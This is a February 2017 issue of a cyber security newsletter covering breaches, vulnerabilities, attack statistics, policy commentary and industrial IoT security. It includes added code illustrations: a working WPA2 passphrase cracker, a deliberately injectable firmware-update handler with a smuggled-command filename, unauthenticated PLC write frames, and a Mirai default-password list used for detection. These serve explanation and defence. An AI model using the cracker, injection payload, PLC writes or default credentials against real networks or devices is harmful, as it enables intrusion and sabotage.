Cyber world online version with links


February 2017

CYBER WORLD Rounding up the latest in Cyber Security

In this month’s edition:
• Latest News
• Newest Vulnerabilities
• Monthly Cyber Analysis
• Special Guest (Faisal Al Bannai, CEO, DarkMatter)
• Expert Opinion (Talal Rajab)
• Key Cyber Security Skills in the Digital Age (Kevin Murphy)
• How to Tackle the Human Aspect of Cyber Security (Daryl Flack)
• IoT - Security Issues in Factory Automation and Control
• Rising Star (Siming Wei)
• Upcoming Events


CyberWorld.News


Hello. Welcome to the February 2017 edition of Cyber World, the monthly magazine that brings you the latest news in the world of cyber security. We bring you analyses from leading industry professionals, academics and rising stars in the industry, together with a roundup of the latest industry news, latest vulnerabilities and threat intelligence.

In this edition, we are proud to present a special guest contribution by DarkMatter founder and CEO, Mr Faisal Al Bannai. We are also excited to publish analyses by Daryl Flack, co-founder and CIO of Blockphish and security lead for the Smart Metering Implementation Programme at the Department for Business, Energy and Industrial Strategy (BEIS). We also have an article by Kevin Murphy, a Cyber Security, Risk and Privacy Specialist at the Royal Bank of Scotland and president of the ISACA Scottish Chapter, and one by Talal Rajab, Head of Programme for Cyber and National Security at techUK. This edition also includes an analysis on ‘IoT - Security Issues in Factory Automation and Control’ as well as an interview with our Rising Star, Siming Wei, a Cyber Security senior associate at PwC. We are also excited to present the new look and feel of our magazine.

As always, we thank all our readers for their interest and valuable feedback, and we look forward to your continued engagement with our magazine. If you enjoy it, feel free to share it with your friends and colleagues; your feedback is always welcome.

Laith Gharib Managing Director


Major Incidents Rounding up the news

Siblings Arrested Over Italian Elites’ Hack

Police have arrested a brother and sister in Italy who are suspected of having targeted the communications of former Italian PM Matteo Renzi, former PM Mario Monti, Mario Draghi, the head of the European Central Bank, a cardinal and many other VIPs. The pair were caught when they sent a phishing email to a security researcher, who turned it over to the police. The Guardian reports that the hackers stole financial information and then used it ‘in order to make financial gains’, presumably in the financial markets, since there is no evidence of blackmail or of them having sold the data.

Read More on The Guardian

Hackers Seize Exposed MongoDB Databases

MongoDB is a document database popular with JavaScript programmers, because it is queried with JavaScript-style syntax and stores records as JSON-like documents. The problem is that, as commonly installed, it required no authentication at all, and older releases also listened on every network interface, so an instance on a public address accepted connections from anyone. Researcher Niall Merrigan has reported that attackers have seized around 28,000 such databases and are holding them for ransom. The attackers find open instances by port scanning and through Shodan, a search engine that indexes internet-facing services. They delete all the data and insert a single record giving an email address to which the victim is to send payment in order to get the data back. Paying is no guarantee of recovery: a victim should first establish whether the data was actually copied before it was deleted.

Read More on Threat Post
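The two settings behind the mass seizures, shown as an added illustration rather than anything from the article or from Threat Post: a mongod.conf in the shape older packages shipped with, beside its hardened form. The address and port values are assumed.

```yaml
# WEAK: how the seized instances were configured. With no `security` section,
# authorization is off, so any client that can reach port 27017 has full access;
# bindIp 0.0.0.0 exposes that port on every interface, including the public one.
net:
  port: 27017
  bindIp: 0.0.0.0
---
# HARDENED: listen only where the application connects, and require authentication.
net:
  port: 27017
  bindIp: 127.0.0.1            # or the private address of the app server (assumed)
security:
  authorization: enabled       # every client must authenticate and be authorised
```

After enabling `security.authorization`, create the first administrative user over a localhost connection before restarting with the new file, otherwise nobody can log in. Then confirm from an outside host that `mongo --host <public-ip> --eval 'db.adminCommand("listDatabases")'` fails (connection refused, or an unauthorised error) rather than printing a list of databases; an instance that still answers that query is exactly what Shodan indexes and what the attackers found.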



UK Healthcare System Comes Under Attack

Last October the Northern Lincolnshire and Goole NHS (National Health Service) Foundation Trust was infected with the Globe2 ransomware. Hundreds of operations and appointments had to be cancelled; the hospitals simply shut down their computers while they worked out what to do. An audit showed that many hospitals are still running Microsoft Windows XP, which is no longer supported and no longer receives security patches. Barts Health NHS Trust in London, the largest in the UK, reportedly also suffered a ransomware attack on 13th January and took several drives offline as a precaution. In an official statement, however, the Trust denied that the IT problems it experienced were the result of a ransomware attack.

Read More on Cyber News Group

Encoded HTML Phishing Attack on Netflix

FireEye reports that attackers have used phishing to steal Netflix customers’ payment information. The phishing page is delivered as an encoded and encrypted payload rather than as plain HTML, to evade text-based detection; only when the page is opened does JavaScript in it decode the payload and render the fake login form in the browser. To avoid being blacklisted, the kit also served an HTTP 404 error instead of the phishing page to requests it associated with certain large sites, including google.com. Victims are drawn in by a phishing email asking them to update their Netflix account information.

Read More on Fire Eye


Ukraine Power Grid Attacked Again

The power grid in Ukraine, which had already been attacked in December 2015, was attacked again in December 2016. The latest attack resulted in a power cut in the capital, Kyiv, on the night of 17th December, taking out roughly one fifth of the city’s power. The 2015 attack was blamed on Russia, according to the BBC, and the security firm hired to investigate the latest incident, ISSP, says the two hacks are related.

Read More on the BBC

Yahoo Hack Impacts Merger

The news has spread across the globe that hackers stole 1 billion user accounts from Yahoo. Regulators at the SEC (Securities and Exchange Commission) now want to know why Yahoo kept that information secret. Questions have been raised as to whether this failure has had anything to do with Yahoo’s merger with Verizon. News reports claim that as a result Verizon wants to lower the purchase price by $1 billion.

Read More on TechCrunch

San Francisco Train System Hacked

Hackers attacked the ticket machines of San Francisco’s Muni transit system, changing their displays to read “You Hacked, ALL Data Encrypted”. Fortune magazine wrote to the email address the hackers left. They replied that the transportation agency was using equipment as old as Windows 2000 and so was an easy target, and claimed to have stolen 30GB of accounting, payroll, email and other data.

Read More in Fortune



Vulnerabilities Latest Developments and Trends

Deeper Dive — Aircracking

Deeper Dive looks at an attack vector or vulnerability and seeks to better understand how hackers operate and what the best practices are. The topic of this edition is Aircrack-ng, the wireless network auditing suite whose development started in 2006. The suite’s main application is recovering the key or passphrase of a wireless network, and the approach differs for the two families of protection: WEP and WPA/WPA2.

To crack WEP, aircrack-ng captures large numbers of encrypted packets and exploits the statistical weaknesses of RC4 as WEP uses it (the initialisation vectors sent in the clear with every packet) to recover the key directly; the number of packets required depends on the key length. It is estimated that around 20,000 packets are required for a 64-bit key and up to 85,000 for a 128-bit key, and the packet-injection tools in the suite can generate that traffic in minutes. WEP keys are therefore recoverable no matter how well they were chosen.

WPA/WPA2 with a pre-shared key has no such shortcut. aircrack-ng captures the four-way handshake between a client and the access point (deauthenticating a client if necessary to force one), then runs a dictionary attack: each candidate passphrase is turned into the key and checked against the captured handshake. Example wordlists, most containing several million entries, are available online. The attack only succeeds if the passphrase is in the wordlist, so a long random passphrase is not vulnerable to it.

Many tutorials can be found online on how to test a network with aircrack-ng and confirm it is not vulnerable. The official website (aircrack-ng.org) also provides plenty of documentation and walkthroughs to help use the suite. Protecting wireless networks is paramount for any organisation or individual, as they are the gateway to all our personal information stored on the web.
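What the WPA/WPA2 dictionary attack actually computes per guess, as an added example (not code from the article or from the aircrack-ng project): PBKDF2 from passphrase and SSID to the PMK, PRF-512 to the PTK, then the handshake MIC. The handshake is constructed locally with assumed MAC addresses, nonces and EAPOL bytes, and the SSID and passphrase are hypothetical; only the key derivation steps are the real ones.

```python
"""WPA2-PSK dictionary attack as aircrack-ng performs it against a captured
four-way handshake: derive the PMK from each candidate passphrase, expand it to
the PTK, recompute the handshake MIC and compare with the captured one.
Added illustration; the handshake below is CONSTRUCTED locally (fixed MACs and
nonces), not a real capture."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK (= PSK) is PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID,
    4096 iterations, 256 bits. This step is what makes each guess expensive."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, length: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    for i in range((length + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:length]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs || min/max of the nonces).
    All four inputs are visible in a handshake capture; only the PMK is secret."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 key MIC: first 16 bytes of HMAC-SHA1 keyed with the KCK (PTK bytes 0..15)
    over the EAPOL-Key frame with its MIC field zeroed."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack(handshake: dict, wordlist):
    """Return the passphrase in `wordlist` that reproduces the captured MIC, else None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, handshake["ssid"])
        ptk = ptk_from_pmk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                           handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], handshake["eapol"]), handshake["mic"]):
            return candidate
    return None


def make_handshake(passphrase: str, ssid: str) -> dict:
    """CONSTRUCTED stand-in for an airodump-ng capture: assumed addresses and nonces,
    plus the MIC a real client would have sent for this passphrase."""
    hs = {
        "ssid": ssid,
        "ap_mac": bytes.fromhex("00115502abcd"),   # assumed BSSID
        "sta_mac": bytes.fromhex("001122334455"),  # assumed client MAC
        "anonce": bytes(range(32)),                # assumed AP nonce
        "snonce": bytes(range(32, 64)),            # assumed client nonce
        # EAPOL-Key message 2 (version 1, type Key, RSN descriptor) with MIC zeroed
        "eapol": bytes.fromhex("0103005f02010a0000") + bytes(90),
    }
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), hs["ap_mac"],
                       hs["sta_mac"], hs["anonce"], hs["snonce"])
    hs["mic"] = eapol_mic(ptk[:16], hs["eapol"])
    return hs


if __name__ == "__main__":
    capture = make_handshake("dictionary", "CyberWorld")
    print("PMK for 'password'/'IEEE':", pmk_from_passphrase("password", "IEEE").hex())
    print("cracked:", crack(capture, ["password", "letmein", "dictionary", "qwerty"]))
```

The `__main__` block prints the PMK for passphrase `password` and SSID `IEEE`, the test vector from the 802.11 standard, so the derivation can be checked against the published value. Because the SSID is the PBKDF2 salt, precomputed tables only help against common SSIDs, and because every guess costs 4096 HMAC iterations, the attack is bounded by the wordlist: a passphrase that is not in it is never found.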



Eir Modem used by Irish ISP Open to Attack

In November, a writer known only as kenzo2017 found what he calls a ‘serious bug’ in more Eir modems, bringing the number of models that can be hacked to three. The issue is that an attacker can use the TR-069 protocol to change the modem settings. TR-069 is the remote-management protocol ISPs use to reset passwords and make other changes when customers call support, and it is meant to be reachable only by the ISP’s management servers. One problem with this model is the LAN-side management interface: the internal-facing side of the modem is wrongly exposed to the public internet after the device is reset, so anyone on the internet can issue the configuration changes that only the ISP or the customer should be able to make.

Read More on Reverse Engineering Blog

Researchers Hack Samsung Camera

In 2014, researchers at the DEF CON conference demonstrated how to take over a Samsung camera. Samsung’s response was to remove the web interface rather than to fix it. That spurred a hacker group, Exploitee.rs, to ‘take another crack at it’, writes Threat Post. Exploitee.rs is not a secretive group: it lists dozens of devices on its website and publishes code showing how to hack each. The new exploit is delivered to the camera with curl: the script that updates the firmware does not sanitise the input it receives, so the attacker’s own instructions can be appended to the command it runs and are executed on the device.

Read More on Threat Post
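The bug class behind the camera exploit, as an added illustration that is not the camera’s code and not from Exploitee.rs or Threat Post: a firmware-update handler that concatenates a caller-supplied filename into a shell command, beside a hardened version. The update step is simulated by listing the file with `ls` rather than unpacking it, and the filenames are made up.

```python
"""Command injection through an unsanitised filename, the bug class the text
describes in the camera's firmware-update script, shown as a vulnerable Python
handler beside a hardened one. Added illustration; NOT the camera's code."""
import re
import subprocess

# Only a plain basename is acceptable for an uploaded update: no path separators,
# no whitespace, no shell metacharacters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def handle_update_vulnerable(filename: str) -> str:
    """Builds a command line by string concatenation and hands it to a shell, so a
    filename such as 'fw.bin; echo INJECTED' runs the attacker's command as well,
    with the handler's privileges (root on most embedded devices)."""
    cmd = "ls -l " + filename
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def handle_update_hardened(filename: str) -> str:
    """Rejects anything but a plain basename and passes it as one argv element, so
    no shell ever parses it and metacharacters are inert."""
    if not SAFE_NAME.match(filename):
        raise ValueError("rejected update filename: %r" % filename)
    return subprocess.run(["ls", "-l", filename], capture_output=True, text=True).stdout


if __name__ == "__main__":
    crafted = "fw.bin; echo INJECTED"
    print("vulnerable handler output:", repr(handle_update_vulnerable(crafted)))
    try:
        handle_update_hardened(crafted)
    except ValueError as err:
        print("hardened handler:", err)
```

The allow-list is deliberately narrow: quoting the filename for the shell would also stop this particular payload, but an argv list removes the shell from the path entirely, and the validation stops path traversal (`../`) that quoting would not.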


iTunes and App Store Vulnerable to Malware

Vulnerability Lab showed that a user can enter JavaScript into the iTunes form where users sign up to be notified when a new app is released. The field is supposed to be treated as static text, but a coding error causes whatever is entered there to be rendered as script or markup rather than as plain text. The notification function also lets the attacker spoof the email address, so the attacker can sign up for a notification and have Apple’s own servers deliver the phishing content to an Apple user from an address the user trusts.

Read More on Vulnerability Lab

FTC Files Injunction against D-Link

The FTC filed a Complaint for Permanent Injunction and Other Equitable Relief against D-Link Corporation, maker of routers and IP cameras. The complaint says that ‘defendants have failed to take reasonable steps to protect their routers and IP cameras from widely known and reasonably foreseeable risks of unauthorized access…’, including ‘hard-coded user credentials and other backdoors and command injection flaws…’. The FTC also chastises the company for storing passwords in clear text. The devices named are the N300 Router, the N Dual Band Router and the N Network Cameras.

Read More on ITPro

New Malware Threatens Mac and Linux

Fruitfly, also known as Quimitchin, is a newly discovered but apparently old piece of malware that targets Mac systems; because macOS and Linux share a Unix heritage, much of it also runs on Linux. Malwarebytes uncovered it when an infected machine was seen making connections to several IP addresses and sending out screenshots. How long the code had been on the machine is unknown, but it may have been there for years: its coding techniques show a limited understanding of macOS and some dated design choices. Apple has released a fix.

Read More on HackRead



Monthly Analysis November-December Threat Roundup

Global Distribution of Attacks

November and December saw an increase in attacks from previous months, with 74 and 103 recorded attacks respectively. This could be due to the Christmas holidays giving attackers more time to seek out targets. The US accounted for only 38% of attacks over the two-month period, which shows the attacks were more widely distributed across other parts of the world, as seen for example in the increase in attacks in India.

[Chart: Global Distribution of Attacks, November-December. Countries shown: US, UK, India, Israel, Ecuador, Global. Regions shown: Middle East, International, Asia Pacific, Europe, North America.]

Attack Timeline

The timeline graph covers the 61 days of the two-month period, with the usual ups and downs, especially from the beginning to mid-November. There was also a slight spike in activity the week before Christmas, followed by a sharp dip on 22nd December.

[Chart: Attack Timeline, November-December.]

Top Sectors Targeted

The Government sector experienced nearly double the breaches of the second most targeted sector, Online Services, which had 37 attacks. There was a significant increase in attacks in the ‘Other’ sectors category, which includes a large number of universities that were attacked. The remaining categories, Healthcare, Finance and Single Individuals, experienced 23, 18 and 6 incidents respectively.



Most Used Attack Vectors

The pie chart shows a relatively even distribution of attacks across the different attack vectors. Account Hijacking was the most prominent known vector, which could be a result of the OurMine Twitter account hijackings that occurred. There was also a significant increase in DDoS attacks, with services like Steam and Tumblr suffering outages for several hours. SQLi makes a strong return, having been absent from the December edition’s analysis.

[Pie chart: Most Used Attack Vectors, November-December. Shares shown: 25%, 16%, 15%, 13%, 11%, 10%, 10%.]

Credentials Stolen

In three days alone, over 100 million credentials were leaked. It is interesting to note that when comparing the attack timeline with the credentials stolen, there appears to be no correlation. This suggests that these large credential breaches each stem from a single attack rather than from the day-to-day volume of incidents.

[Chart: Credentials Stolen, November-December (exponential scale used).]




VisDa

Take control of your data

A revolutionary complete track and trace tool that visualises and analyses data transfers to understand what, how and where information is moving, to achieve regulatory compliance.

Key Features:
• GDPR transfers compliance score
• Instantly identify high-risk communications
• All files transferred across a network are stored and recorded
• All content is fully text indexed, so information can easily be accessed
• Scalable: our solution is proven on networks that operate up to 1 Tb/s

www.secgate.co.uk/visda



Special Guest

Faisal Al Bannai



Making the Case for a Ministerial Cyber Security Appointment

About the Author: Faisal Al Bannai is Founder and Chief Executive Officer of DarkMatter, an international cyber security company based in the UAE, which is empowering digitisation globally. He can be reached on Twitter @albannai_faisal

In February 2016, President Obama established the Commission on Enhancing National Cyber Security with an Executive Order. The Commission completed its report on December 1, 2016, providing detailed short-term and long-term recommendations to strengthen cyber security in both the public and private sectors, while protecting privacy, fostering innovation and ensuring economic and national security. The report emphasises the need for partnerships between the public and private sectors, as well as international engagement. It also discusses the role consumers must play in enhancing the US’ digital security. The report categorises its recommendations within six overarching imperatives focused on infrastructure, investment, consumer education, workforce capabilities, government operations and requirements for a fair and open global digital economy. The six imperatives are:

1. Protect, defend, and secure today’s information infrastructure and digital networks.
2. Innovate and accelerate investment for the security and growth of digital networks and the digital economy.
3. Prepare consumers to thrive in a digital age.
4. Build cyber security workforce capabilities.
5. Better equip government to function effectively and securely in the digital age.
6. Ensure an open, fair, competitive, and secure global digital economy.


The Commission’s recommendations are not binding, though it would be prudent at least to consider the report’s references and overviews, given the broad base of expertise drawn on in preparing the document: consultation with technical and policy experts, input from the public through open hearings and a request for information, and a review of the existing literature. The heightened level of cyber threat at a national level is not just a US phenomenon but a trend that is growing across the globe, and it is high time cyber security was reflected within every government ministry and agency as a core function, with a direct reporting line to senior officials clearly defined and implemented.

The importance of securing digital infrastructure has become as important to a nation’s continued development as its choice of domestic or foreign policy, and in many ways cyber security spans both of these important areas, given the rise in threats emanating from within countries and those being faced from abroad. The six imperatives included in the Enhancing National Cyber Security report offer a strong framework for any progressive nation anywhere in the world to consider its cyber security posture and to take pro-active measures to improve its defences, given the uncertain nature of threat actors, be they nation states or hacktivists, common criminals or other unknown adversaries.

It is telling that the first imperative in the report relates to “protecting, defending, and securing today’s information infrastructure and digital networks” as a guiding requirement, given that we believe this is the key factor in creating a trusted and sustainable digital environment in which all participants have the confidence to invest and prosper. This imperative is aligned to the Cyber Security Life-Cycle, which covers the planning, detection, protection and recovery of digital assets in order to mitigate the threat of a cyber incident. A holistic, end-to-end approach to cyber security is the most effective way to counter the ever-expanding cyber threat landscape, as it is clear that preventing or avoiding every cyber incident is just not possible.

Faisal Al Bannai, Co-founder and CEO of DarkMatter



Third Party Risk Management

Do you:
• rely on third parties to deliver services to clients?
• trust third parties with your company’s confidential data?
• integrate networks, systems or applications with third party solutions?
• assess your suppliers for their criticality?

We will:
• build you an operating model to identify and reduce third party risk;
• implement an end-to-end third party risk management process within your business;
• manage and deliver your third party assurance programme;
• support your supplier criticality assessments.

Get in touch for a free consultation: info@secgate.co.uk



IoT — Security Issues in Factory Automation and Control

An IoT DDoS attack against Dyn (dyn.com) in October used internet-connected devices of the kind also found on factory floors, chiefly IP cameras and DVRs, to take down Netflix, Twitter, Amazon and other high-profile sites across large sections of the USA for several hours. Dyn provides managed DNS: its authoritative name servers answer the queries that turn those sites’ names into addresses, so flooding them made the sites unreachable even though the sites themselves were untouched. The attackers used the default user ID and password built into the devices to build a botnet. This open IoT component was a large security hole that not many people had thought about before. Cyber defences are traditionally focused on hardening the IT systems in the plant, not the automation devices themselves.

Here we look at that exploit, and more generally at the nature of IoT in the factory.

FACTORY AUTOMATION

There are two sides to IoT in the factory: factory automation, and sensor-driven IP devices operating over wired and wireless networks. The second is what we usually think of when we write about IoT. But if you talk to engineers who programme PLC devices, they will tell you that they have been doing IoT for decades. The only thing new is the name assigned to it.


True. Yet the difference is that today there is the cloud, big-data databases and analytics. But programming a serial or Ethernet PLC to control a lathe, welding machine or painting machine is still an old-fashioned ordeal of writing ladder logic in desktop PC software such as RSLogix for Allen-Bradley PLCs. This kind of tedious programming has nothing to do with writing web services or using a full-featured programming language. Instead, the PLC programmer works with the controller’s memory directly, addressed by data ‘file’ and element: the file is identified by its type and number (an integer file N7, a bit file B3, a timer file T4), the element is the offset of one entry within that file, and an optional sub-element or bit selects a field within that entry. The size of an element depends on the file type (an integer element is one 16-bit word; timer and counter elements are three words), and addresses are written in decimal, hexadecimal or octal depending on the file (PLC-5 I/O addresses are octal). In the DF1 serial protocol that Allen-Bradley controllers speak, a read or write command carries exactly those fields, file number, file type, element number and sub-element, together with the number of bytes to transfer, and values are written as sequences of raw words. Nothing in the protocol authenticates the sender: a command frame is accepted from anyone who can put bytes on the serial line or the Ethernet segment. The resulting commands are simple things like start, stop, change baud rate and rotate, which together describe a complete industrial process. Industrial network routers convert this serial (or Ethernet) traffic to send it to other serial or Ethernet devices, and to the management cloud. So it is hard to imagine a hacker attacking this, since hackers are focused on PC hardware and network devices. Yet, attacking PLC devices is exactly what the



American spy agencies allegedly did in 2010. They are said to have attacked the Siemens PLCs that ran the centrifuges in Iranian nuclear fuel enrichment facilities. The Stuxnet worm reached the plant on Windows PCs, spreading through infected USB drives and Windows vulnerabilities rather than over the internet, and from the engineering workstations it reprogrammed the controllers. The attack caused the centrifuges to spin outside their safe speed range and break, while the operators’ screens showed normal readings. That wildly effective, daring operation dealt a huge blow to Iran’s nuclear programme.

SENSOR-DRIVEN IOT

The other side of IoT is sensors deployed for preventive maintenance, predictive models, measuring uptime, and gathering the data used to change the line: adding assembly and subassembly stations, adding shift operators, improving training and shifting material flow. Acoustic sensors ping parts and measure resonance to test the quality of materials and of the completed product. Transducers convert mechanical to electrical energy to check vibration; increased vibration indicates when a machine needs new filters, maintenance or calibration. Plants count items with cameras to measure operator and station productivity, and monitor emissions, temperature, humidity, ambient light and so on. All of this data is used both to operate the plant in real time and to fine-tune the factory floor through offline, after-the-fact analysis, with changes to the assembly line made in planning software designed for that purpose.

IP CAMERA EXPLOIT

The October attack was carried out through IoT devices that their Chinese manufacturer has since replaced. Attackers planted the Mirai DDoS malware in IP cameras and DVRs made by XiongMai Technologies and unleashed reportedly up to 1.4 Tbps of DNS traffic at Dyn’s infrastructure. That was more traffic than the servers could respond to, which took them offline. IP (internet protocol) cameras are by definition connected to the internet, so there was no need to attack them over a wireless industrial or wired non-Ethernet protocol, as would be the case with an industrial controller. And the cameras’ IP addresses are what let the attackers find them in the first place.

In its write-up of the attack, Dyn made the problem clear: “During a DDoS which uses the DNS protocol it can be difficult to distinguish legitimate traffic from attack traffic.” Despite its efforts to surge bandwidth and shape traffic, two successive waves of attacks overwhelmed its systems for several hours. The source code for Mirai is freely available on the internet, so the attackers did not write anything new. One part of the attack came from the Mirai command-and-control centre, showing perhaps an increased level of sophistication that warrants further analysis.

The attackers planted the malware easily because the devices still had their default user ID and password, which were hard-coded into the firmware and could not be changed by the owner. Mirai simply logged in over telnet (and, on some devices, SSH) with those credentials.

The same botnet had earlier in 2016 been turned on the security blog KrebsOnSecurity and the French ISP and hosting company OVH. Different parties have claimed responsibility, although no group has yet been confirmed as the actual culprit. The consensus is that this was not state-sponsored.
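The DF1 command frames described in the PLC section above, as an added example rather than anything from the article or from Allen-Bradley’s tooling: building a read and a write request for a data-file address, with DLE stuffing and the BCC check character, and parsing one back. The frame layout and BCC follow the published DF1 protocol; the file-type codes are those used for SLC 500/MicroLogix data files and are taken as an assumption from public driver implementations; the addresses (N7:0), node numbers and transaction numbers are hypothetical, and no device is contacted.

```python
"""Allen-Bradley DF1 full-duplex command frames as a PLC programming tool, or an
attacker on the serial link, would send them. Added illustration, not from the
article: layout and BCC per the DF1 protocol manual; file-type codes for SLC 500/
MicroLogix data files are ASSUMED from public driver implementations."""
DLE, STX, ETX = 0x10, 0x02, 0x03
CMD_PROTECTED_TYPED = 0x0F          # "protected typed" command class (SLC/MicroLogix)
FNC_LOGICAL_READ_3 = 0xA2           # protected typed logical read, three address fields
FNC_LOGICAL_WRITE_3 = 0xAA          # protected typed logical write, three address fields
FILE_TYPES = {"N": 0x89, "F": 0x8A, "B": 0x85, "T": 0x86, "C": 0x87, "O": 0x8B, "I": 0x8C}


def bcc(payload: bytes) -> int:
    """Block check character: two's complement of the 8-bit sum of the payload.
    It catches line noise only; it is not a MAC, so anyone can forge a valid frame."""
    return (-sum(payload)) & 0xFF


def build_frame(dst: int, src: int, tns: int, app: bytes) -> bytes:
    """DLE STX | DST SRC CMD STS TNS(lo,hi) app... | DLE ETX | BCC, with every DLE in
    the payload doubled (DLE stuffing) so it cannot be mistaken for a delimiter."""
    payload = bytes([dst, src, CMD_PROTECTED_TYPED, 0x00, tns & 0xFF, (tns >> 8) & 0xFF]) + app
    stuffed = payload.replace(bytes([DLE]), bytes([DLE, DLE]))
    return bytes([DLE, STX]) + stuffed + bytes([DLE, ETX, bcc(payload)])


def read_request(dst, src, tns, file_no, file_type, element, nbytes=2) -> bytes:
    """Read `nbytes` starting at e.g. N7:0 -> file 7, type N, element 0, sub-element 0."""
    app = bytes([FNC_LOGICAL_READ_3, nbytes, file_no, FILE_TYPES[file_type], element, 0])
    return build_frame(dst, src, tns, app)


def write_request(dst, src, tns, file_no, file_type, element, value: int) -> bytes:
    """Write one 16-bit word. Note that no credential appears anywhere in the frame."""
    data = value.to_bytes(2, "little", signed=True)
    app = bytes([FNC_LOGICAL_WRITE_3, len(data), file_no, FILE_TYPES[file_type], element, 0]) + data
    return build_frame(dst, src, tns, app)


def parse_frame(frame: bytes) -> dict:
    """Strip the framing, undo DLE stuffing, verify the BCC and split the fields."""
    if frame[:2] != bytes([DLE, STX]) or frame[-3:-1] != bytes([DLE, ETX]):
        raise ValueError("not a DF1 full-duplex frame")
    payload = frame[2:-3].replace(bytes([DLE, DLE]), bytes([DLE]))
    if bcc(payload) != frame[-1]:
        raise ValueError("BCC mismatch")
    return {"dst": payload[0], "src": payload[1], "cmd": payload[2], "sts": payload[3],
            "tns": payload[4] | (payload[5] << 8), "fnc": payload[6], "data": payload[7:]}


if __name__ == "__main__":
    frame = read_request(dst=1, src=0, tns=1, file_no=7, file_type="N", element=0)
    print(frame.hex(" "))   # 10 02 01 00 0f 00 01 00 a2 02 07 89 00 00 10 03 bb
    print(parse_frame(frame))
```

The write frame is the security-relevant one: a handful of bytes, addressed by file and element, changes a setpoint or an output, and the only check the receiver performs is the BCC. Segmenting the serial and Ethernet links that carry DF1, and monitoring them for write function codes from unexpected sources, is therefore where the defence has to sit; the protocol offers none.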
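The default-credential logins that built the Mirai botnet leave a recognisable trace, and spotting it is the check a plant or ISP operator wants. As an added example (not code from the article, from Dyn or from the Mirai source), this scans a telnet login log from a device or honeypot for username/password pairs taken from the scanner table in the published Mirai source, flags sources that cycle through several of them, and flags any successful login with such a pair. The log format and all log lines are constructed for the example.

```python
"""Flagging Mirai-style default-credential logins in a telnet login log.
Added illustration; the log lines are CONSTRUCTED and the log format is ASSUMED
(one line per attempt: timestamp, source IP, user, password, result)."""
import re
from collections import defaultdict

# Username/password pairs from the scanner table in the published Mirai source
# (a subset). root/xc3511 is the factory default of XiongMai-based DVRs and cameras.
MIRAI_DEFAULTS = {
    ("root", "xc3511"), ("root", "vizxv"), ("root", "admin"), ("admin", "admin"),
    ("root", "888888"), ("root", "xmhdipc"), ("root", "default"), ("root", "juantech"),
    ("root", "123456"), ("root", "54321"), ("support", "support"), ("root", ""),
    ("admin", "password"), ("root", "root"), ("root", "12345"), ("user", "user"),
    ("admin", ""), ("root", "pass"), ("admin", "admin1234"), ("root", "1111"),
    ("admin", "smcadmin"), ("root", "666666"), ("root", "password"), ("root", "1234"),
    ("root", "klv123"), ("root", "7ujMko0vizxv"), ("root", "7ujMko0admin"),
    ("root", "system"), ("root", "ikwb"), ("root", "dreambox"), ("root", "realtek"),
    ("root", "00000000"), ("admin", "1234"), ("ubnt", "ubnt"), ("guest", "guest"),
}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) telnet src=(?P<src>[\d.]+) user=(?P<user>\S*) pass=(?P<pw>\S*) "
    r"result=(?P<result>OK|FAIL)$"
)

# CONSTRUCTED sample: one scanner cycling through default pairs, one legitimate login,
# and one device that still has the XiongMai default and gets taken over.
SAMPLE_LOG = """\
2016-10-21T11:02:13Z telnet src=198.51.100.7 user=root pass=xc3511 result=FAIL
2016-10-21T11:02:14Z telnet src=198.51.100.7 user=root pass=vizxv result=FAIL
2016-10-21T11:02:14Z telnet src=10.0.0.2 user=admin pass=Str0ng-Unique! result=OK
2016-10-21T11:02:15Z telnet src=198.51.100.7 user=admin pass=admin result=FAIL
2016-10-21T11:02:16Z telnet src=198.51.100.7 user=root pass=888888 result=OK
2016-10-21T11:03:40Z telnet src=203.0.113.5 user=root pass=xc3511 result=OK
this line is not in the expected format and is skipped
""".splitlines()


def parse_line(line: str):
    """Return the fields of one log line as a dict, or None for lines that do not parse."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def analyse(lines, threshold: int = 3) -> dict:
    """Return sources that tried at least `threshold` distinct Mirai pairs (scanners)
    and every successful login that used a Mirai pair (a device now in the botnet)."""
    tried = defaultdict(set)
    compromised = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        cred = (ev["user"], ev["pw"])
        if cred not in MIRAI_DEFAULTS:
            continue
        tried[ev["src"]].add(cred)
        if ev["result"] == "OK":
            compromised.append((ev["src"], cred))
    scanners = sorted(src for src, creds in tried.items() if len(creds) >= threshold)
    return {"scanners": scanners, "compromised": compromised}


if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```

A single hit on a default pair is weak evidence, since legitimate administrators also type `admin/admin`; several distinct pairs from one source within seconds is the scanner’s signature, and a successful login with one of them means the device needs to be pulled off the network, because its owner cannot change the credential.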


Forest Tree
The most advanced cyber security solution

Forest Tree is a patented advanced cyber security solution that allows organisations to monitor and understand the content and context of each electronic communication channel, from documents leaving the organisation and malicious traffic to user behaviour. The captured network information is processed and systematically analysed in order to extract all the information and metadata contained in the communication channels.

• High performance: 1 Tb/s
• Unique: patented technology
• Highly scalable: big data storage
• Proactive: block advanced threats
• Intelligent: in-depth analysis
• Low maintenance: purpose built

A single platform solution: Network Forensics, Anomaly Detection, Security Analytics, User Profiling, Machine Learning.

